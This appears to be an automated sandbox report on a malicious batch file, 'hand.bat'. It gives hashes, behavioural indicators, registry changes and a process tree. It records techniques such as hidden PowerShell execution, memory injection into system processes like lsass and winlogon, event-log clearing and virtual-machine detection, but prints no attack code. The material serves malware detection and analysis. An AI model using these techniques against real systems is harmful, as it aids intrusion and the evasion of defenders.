Analysis
max time kernel: 150s
max time network: 151s
platform: windows11-21h2_x64
resource: win11-20241007-en
resource tags: arch:x64, arch:x86, image:win11-20241007-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 19-11-2024 21:24
Static task: static1
Behavioral task: behavioral1 (sample: hand.bat, resource: win10v2004-20241007-en)
Behavioral task: behavioral2 (sample: hand.bat, resource: win10ltsc2021-20241023-en)
Behavioral task: behavioral3 (sample: hand.bat, resource: win11-20241007-en)
General
Target: hand.bat
Size: 7.0MB
MD5: 1a013c7ac90b58073895b26cae70def7
SHA1: 60c9c3294fc7ac3d336a478274f62f4818498230
SHA256: 698b1f0a35a76e57adef388612b29902f86f56983c772d7c6c17b4483c2be688
SHA512: c1bbb52e8546b352e041e944d7dfa158d5dc9a51b1628128d345e4a9e708871d7a1f5e59cc44a2c66f8dc9af81ec06e1b5105d5a7292497075564496f3b0ec75
SSDEEP: 49152:vZrlGoT+Xts/LJjeDPnIwT0ZFBZP2x3fLKs0HMb0DprNMiKwPjp9Kw2EdF8d7nrx:Y
Malware Config
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoCs)
description | pid | Process | procid_target
PID 4800 created 640 | 4800 | powershell.exe | 5
Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)
Run Powershell and hide display window.
pid | Process
4800 | powershell.exe
3504 | powershell.exe
Indicator Removal: Clear Windows Event Logs (1 TTPs, 8 IoCs)
Clear Windows Event Logs to hide the activity of an intrusion.
description | ioc | Process
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-TWinUI%4Operational.evtx | svchost.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx | svchost.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-DxgKrnl-Admin.evtx | svchost.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-DxgKrnl-Operational.evtx | svchost.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Audio%4Operational.evtx | svchost.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Audio%4CaptureMonitor.evtx | svchost.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Audio%4PlaybackManager.evtx | svchost.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-AppxPackaging%4Operational.evtx | svchost.exe
Drops file in System32 directory (3 IoCs)
description | ioc | Process
File created | C:\Windows\system32\wbem\Performance\WmiApRpl_new.h | WMIADAP.EXE
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | OfficeClickToRun.exe
File created | C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini | WMIADAP.EXE
Suspicious use of SetThreadContext (1 IoCs)
description | pid | Process | procid_target
PID 4800 set thread context of 5008 | 4800 | powershell.exe | 83
Drops file in Windows directory (2 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\$rbx-onimai2 | powershell.exe
File created | C:\Windows\$rbx-onimai2\$rbx-CO2.bat | cmd.exe
Checks SCSI registry key(s) (3 TTPs, 16 IoCs)
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | dwm.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | dwm.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | dwm.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | dwm.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | dwm.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | dwm.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | dwm.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | dwm.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | svchost.exe
Modifies data under HKEY_USERS (64 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | dwm.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "186" | LogonUI.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | dwm.exe
Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" | LogonUI.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 19 Nov 2024 21:26:16 GMT" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E | dwm.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" | LogonUI.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | dwm.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={64BB3CD5-F298-4409-BD20-168FD84FF663}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | OfficeClickToRun.exe
Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | LogonUI.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates | dwm.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" | LogonUI.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\CTF\RemoteSession | winlogon.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\CTF\RemoteSession\Profile | winlogon.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\CTF\RemoteSession\KeyboardLayout = "0" | winlogon.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | dwm.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" | LogonUI.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | OfficeClickToRun.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E | dwm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft | dwm.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1732051575" | OfficeClickToRun.exe
Modifies registry class (2 IoCs)
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | Explorer.EXE
Suspicious behavior: EnumeratesProcesses (29 IoCs)
pid | Process
4800 | powershell.exe (x3)
5008 | dllhost.exe (x8)
3504 | powershell.exe (x3)
5008 | dllhost.exe (x8)
3504 | powershell.exe (x1)
5008 | dllhost.exe (x5)
3504 | powershell.exe (x1)
Suspicious behavior: LoadsDriver (64 IoCs)
pid | Process
All 64 entries report "Process not Found" for the following PIDs, in order: 3472, 1236, 1700, 1100, 4956, 1332, 1408, 3608, 4268, 2996, 4448, 1084, 1240, 3616, 1236, 580, 652, 2872, 424, 504, 432, 1700, 3040, 1880, 840, 5096, 2172, 860, 1796, 416, 224, 564, 3184, 788, 3432, 4968, 1444, 3608, 4268, 2996, 3632, 3368, 3724, 4924, 3692, 3800, 1076, 1380, 904, 5040, 2828, 1400, 4448, 4124, 2932, 3068, 1844, 4708, 2792, 1240, 4128, 3192, 980, 3868
Suspicious use of AdjustPrivilegeToken (64 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 4800 | powershell.exe
Token: SeDebugPrivilege | 5008 | dllhost.exe
Token: SeCreateGlobalPrivilege | 3296 | dwm.exe
Token: SeChangeNotifyPrivilege | 3296 | dwm.exe
Token: 33 | 3296 | dwm.exe
Token: SeIncBasePriorityPrivilege | 3296 | dwm.exe
Token: SeCreateGlobalPrivilege | 3176 | dwm.exe
Token: SeChangeNotifyPrivilege | 3176 | dwm.exe
Token: 33 | 3176 | dwm.exe
Token: SeIncBasePriorityPrivilege | 3176 | dwm.exe
Token: SeShutdownPrivilege | 3372 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3372 | Explorer.EXE
Token: SeCreateGlobalPrivilege | 3440 | dwm.exe
Token: SeChangeNotifyPrivilege | 3440 | dwm.exe
Token: 33 | 3440 | dwm.exe
Token: SeIncBasePriorityPrivilege | 3440 | dwm.exe
Token: SeShutdownPrivilege | 3372 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3372 | Explorer.EXE
Token: SeShutdownPrivilege | 3372 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3372 | Explorer.EXE
Token: SeCreateGlobalPrivilege | 2904 | dwm.exe
Token: SeChangeNotifyPrivilege | 2904 | dwm.exe
Token: 33 | 2904 | dwm.exe
Token: SeIncBasePriorityPrivilege | 2904 | dwm.exe
Token: SeShutdownPrivilege | 3372 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3372 | Explorer.EXE
Token: SeShutdownPrivilege | 3372 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3372 | Explorer.EXE
Token: SeCreateGlobalPrivilege | 3152 | dwm.exe
Token: SeChangeNotifyPrivilege | 3152 | dwm.exe
Token: 33 | 3152 | dwm.exe
Token: SeIncBasePriorityPrivilege | 3152 | dwm.exe
Token: SeShutdownPrivilege | 3372 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3372 | Explorer.EXE
Token: SeShutdownPrivilege | 3372 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3372 | Explorer.EXE
Token: SeDebugPrivilege | 3504 | powershell.exe
Token: SeCreateGlobalPrivilege | 4064 | dwm.exe
Token: SeChangeNotifyPrivilege | 4064 | dwm.exe
Token: 33 | 4064 | dwm.exe
Token: SeIncBasePriorityPrivilege | 4064 | dwm.exe
Token: SeShutdownPrivilege | 3372 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3372 | Explorer.EXE
Token: SeShutdownPrivilege | 3372 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3372 | Explorer.EXE
Token: SeCreateGlobalPrivilege | 380 | dwm.exe
Token: SeChangeNotifyPrivilege | 380 | dwm.exe
Token: 33 | 380 | dwm.exe
Token: SeIncBasePriorityPrivilege | 380 | dwm.exe
Token: SeShutdownPrivilege | 3372 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3372 | Explorer.EXE
Token: SeShutdownPrivilege | 3372 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3372 | Explorer.EXE
Token: SeCreateGlobalPrivilege | 4232 | dwm.exe
Token: SeChangeNotifyPrivilege | 4232 | dwm.exe
Token: 33 | 4232 | dwm.exe
Token: SeIncBasePriorityPrivilege | 4232 | dwm.exe
Token: SeShutdownPrivilege | 3372 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3372 | Explorer.EXE
Token: SeShutdownPrivilege | 3372 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3372 | Explorer.EXE
Token: SeShutdownPrivilege | 3372 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3372 | Explorer.EXE
Token: SeAuditPrivilege | 2588 | svchost.exe
Suspicious use of FindShellTrayWindow (2 IoCs)
pid | Process
3372 | Explorer.EXE (x2)
Suspicious use of SendNotifyMessage (30 IoCs)
pid | Process
3372 | Explorer.EXE (x30)
Suspicious use of SetWindowsHookEx (1 IoCs)
pid | Process
5060 | LogonUI.exe
Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | Process | procid_target
PID 3120 wrote to memory of 4308 | 3120 | cmd.exe | 81 (x2)
PID 3120 wrote to memory of 4800 | 3120 | cmd.exe | 82 (x2)
PID 4800 wrote to memory of 5008 | 4800 | powershell.exe | 83 (x8)
PID 5008 wrote to memory of 640 | 5008 | dllhost.exe | 5
PID 5008 wrote to memory of 696 | 5008 | dllhost.exe | 7
PID 5008 wrote to memory of 996 | 5008 | dllhost.exe | 12
PID 5008 wrote to memory of 548 | 5008 | dllhost.exe | 13
PID 696 wrote to memory of 2576 | 696 | lsass.exe | 44 (x3)
PID 5008 wrote to memory of 772 | 5008 | dllhost.exe | 14
PID 5008 wrote to memory of 724 | 5008 | dllhost.exe | 15
PID 5008 wrote to memory of 1064 | 5008 | dllhost.exe | 16
PID 5008 wrote to memory of 1088 | 5008 | dllhost.exe | 17
PID 5008 wrote to memory of 1128 | 5008 | dllhost.exe | 18
PID 5008 wrote to memory of 1152 | 5008 | dllhost.exe | 19
PID 5008 wrote to memory of 1248 | 5008 | dllhost.exe | 21
PID 5008 wrote to memory of 1288 | 5008 | dllhost.exe | 22
PID 5008 wrote to memory of 1356 | 5008 | dllhost.exe | 23
PID 4800 wrote to memory of 4724 | 4800 | powershell.exe | 87 (x2)
PID 696 wrote to memory of 2576 | 696 | lsass.exe | 44 (x2)
PID 5008 wrote to memory of 1492 | 5008 | dllhost.exe | 24
PID 5008 wrote to memory of 1508 | 5008 | dllhost.exe | 25
PID 5008 wrote to memory of 1592 | 5008 | dllhost.exe | 26
PID 5008 wrote to memory of 1608 | 5008 | dllhost.exe | 27
PID 5008 wrote to memory of 1716 | 5008 | dllhost.exe | 28
PID 5008 wrote to memory of 1724 | 5008 | dllhost.exe | 29
PID 5008 wrote to memory of 1776 | 5008 | dllhost.exe | 30
PID 5008 wrote to memory of 1872 | 5008 | dllhost.exe | 31
PID 5008 wrote to memory of 1884 | 5008 | dllhost.exe | 32
PID 5008 wrote to memory of 1952 | 5008 | dllhost.exe | 33
PID 5008 wrote to memory of 1968 | 5008 | dllhost.exe | 34
PID 5008 wrote to memory of 1052 | 5008 | dllhost.exe | 35
PID 5008 wrote to memory of 1172 | 5008 | dllhost.exe | 36
PID 5008 wrote to memory of 2104 | 5008 | dllhost.exe | 37
PID 640 wrote to memory of 3296 | 640 | winlogon.exe | 89 (x2)
PID 5008 wrote to memory of 3296 | 5008 | dllhost.exe | 89
PID 696 wrote to memory of 2576 | 696 | lsass.exe | 44
PID 5008 wrote to memory of 2212 | 5008 | dllhost.exe | 39
PID 5008 wrote to memory of 2432 | 5008 | dllhost.exe | 40
PID 5008 wrote to memory of 2440 | 5008 | dllhost.exe | 41
PID 5008 wrote to memory of 2480 | 5008 | dllhost.exe | 42
PID 5008 wrote to memory of 2532 | 5008 | dllhost.exe | 43
PID 5008 wrote to memory of 2576 | 5008 | dllhost.exe | 44
PID 4800 wrote to memory of 2380 | 4800 | powershell.exe | 90 (x2)
PID 696 wrote to memory of 2576 | 696 | lsass.exe | 44 (x2)
PID 5008 wrote to memory of 2588 | 5008 | dllhost.exe | 45
PID 5008 wrote to memory of 2616 | 5008 | dllhost.exe | 46
PID 640 wrote to memory of 3176 | 640 | winlogon.exe | 226 (x2)
Processes
C:\Windows\system32\winlogon.exe  [depth 1, PID 640]
  command: winlogon.exe
  - Modifies data under HKEY_USERS
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\dwm.exe  [depth 2, PID 548]
    command: "dwm.exe"
  C:\Windows\System32\dllhost.exe  [depth 2, PID 5008]
    command: C:\Windows\System32\dllhost.exe /Processid:{c1906579-d414-40e0-be3d-afde0745f167}
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
  C:\Windows\system32\dwm.exe  [depth 2, PID 3296]
    command: "dwm.exe"
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\dwm.exe  [depth 2, PID 3176]
    command: "dwm.exe"
    - Checks SCSI registry key(s)
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\dwm.exe  [depth 2, PID 3440]
    command: "dwm.exe"
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\dwm.exe  [depth 2, PID 2904]
    command: "dwm.exe"
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\dwm.exe  [depth 2, PID 3152]
    command: "dwm.exe"
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\dwm.exe  [depth 2, PID 4064]
    command: "dwm.exe"
    - Checks SCSI registry key(s)
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\dwm.exe  [depth 2, PID 380]
    command: "dwm.exe"
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\dwm.exe  [depth 2, PID 4232]
    command: "dwm.exe"
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\LogonUI.exe  [depth 2, PID 5060]
    command: "LogonUI.exe" /flags:0x0 /state0:0xa3a1d855 /state1:0x41c64e6d
    - Modifies data under HKEY_USERS
    - Suspicious use of SetWindowsHookEx
C:\Windows\system32\lsass.exe  [depth 1, PID 696]
  command: C:\Windows\system32\lsass.exe
  - Suspicious use of WriteProcessMemory
C:\Windows\system32\svchost.exe  [depth 1, PID 996]
  command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\svchost.exe  [depth 1, PID 772]
  command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe  [depth 1, PID 724]
  command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe  [depth 1, PID 1064]
  command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe  [depth 1, PID 1088]
  command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe  [depth 1, PID 1128]
  command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe  [depth 1, PID 1152]
  command: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\System32\svchost.exe  [depth 1, PID 1248]
  command: C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
C:\Windows\system32\svchost.exe  [depth 1, PID 1288]
  command: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe  [depth 1, PID 1356]
  command: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
  C:\Windows\system32\sihost.exe  [depth 2, PID 2564]
    command: sihost.exe
C:\Windows\system32\svchost.exe  [depth 1, PID 1492]
  command: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\System32\svchost.exe  [depth 1, PID 1508]
  command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
  - Indicator Removal: Clear Windows Event Logs
C:\Windows\system32\svchost.exe  [depth 1, PID 1592]
  command: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe  [depth 1, PID 1608]
  command: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe  [depth 1, PID 1716]
  command: C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe  [depth 1, PID 1724]
  command: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe  [depth 1, PID 1776]
  command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\system32\svchost.exe  [depth 1, PID 1872]
  command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe  [depth 1, PID 1884]
  command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
  C:\Windows\system32\AUDIODG.EXE  [depth 2, PID 5076]
    command: C:\Windows\system32\AUDIODG.EXE 0x00000000000004D4 0x00000000000004C8
C:\Windows\system32\svchost.exe  [depth 1, PID 1952]
  command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe  [depth 1, PID 1968]
  command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe  [depth 1, PID 1052]
  command: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe  [depth 1, PID 1172]
  command: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\spoolsv.exe  [depth 1, PID 2104]
  command: C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe  [depth 1, PID 2212]
  command: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\svchost.exe  [depth 1, PID 2432]
  command: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe  [depth 1, PID 2440]
  command: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe  [depth 1, PID 2480]
  command: C:\Windows\system32\svchost.exe -k NetworkService -p
